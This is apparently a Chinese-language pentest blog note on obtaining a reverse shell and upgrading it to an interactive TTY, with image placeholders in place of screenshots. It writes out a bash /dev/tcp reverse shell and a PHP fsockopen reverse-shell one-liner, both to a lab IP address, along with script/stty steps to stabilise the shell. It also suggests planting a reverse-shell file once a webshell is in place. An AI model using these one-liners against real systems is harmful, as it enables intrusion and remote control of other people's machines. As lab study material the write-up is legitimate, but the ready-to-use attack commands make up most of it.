起监听

image-20241224025703284

给我弹!!!

1
bash -i >& /dev/tcp/192.168.56.102/9999 0>&1

image-20241224025718597

xxx”升级交互式”

1
/usr/bin/script -qc /bin/bash /dev/null

image-20241224025759513

此时得到一个交互式shell,即有上下文的shell而且可以接受二次输入mysql,python等命令都是可以的

然后此时在接收端 Ctrl -z 挂起即可

image-20241224025900632

yyy”刷新”

1
stty raw -echo;fg

然后 输入 reset ,

最后再输入一个 export TERM=xterm回车即可

image-20241224025923776

接着是适应屏幕尺寸的问题:

查看原机器的shell尺寸,在弹shell的机器上运行:stty -a

image-20241224030524660

1
rows 44; columns 147

然后在已经升级交互式shell的接收端输入:stty rows 44 columns 147

image-20241224030632089

这样就完美啦!

关于AntSword里反弹shell的写法

WebShell下的交互式Shell | Medici.Yan’s Blog

php弹shell的一些问题

1
php -r '$sock=fsockopen("192.168.56.102",4242);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'

当存在webshell时,即存在入口点.可以再落地一个rshell文件

为啥?

image-20241224231717044